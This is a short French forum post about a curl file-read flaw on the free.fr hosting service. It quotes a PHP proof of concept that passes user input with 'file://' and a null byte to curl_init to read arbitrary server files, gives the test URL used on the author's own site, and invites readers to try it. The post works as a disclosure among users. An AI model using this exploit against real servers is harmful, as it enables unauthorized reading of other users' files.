Voilà,
Nous venons d'aborder le sujet de la faille curl sur le chat. (dixit shp)
Et afin de confirmer ou d'infirmer la nouvelle j'ai voulu tester.
Donc voilà,
Après un petit tour sur securityreason.com
Voici l'exploit:
[code:1:b0bd108074]<?
$ch =
curl_init("file://".$_GET['url']."\x00".
__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
[/code:1:b0bd108074]
Et voici l'url donné en argument:
[code:1:b0bd108074]
http://where.is.free.fr/free.php?url=/mnt/156/sdb/e/3/where.is/index.php
[/code:1:b0bd108074]
Je n'en dis pas plus, à vous de tester et d'approfondir si le coeur vous en dis.
Ce n'est pas une raison pour abandonner free car nous n'utilisons pas forcemment curl.
La vrai raison qui doit nous pousser à abandonner free est qu'ils refuse de corriger la faille (dixit shp)
++Korigan
Ps: Je viens de supprimer le fichier, inutile d'essayer sur where.is ^^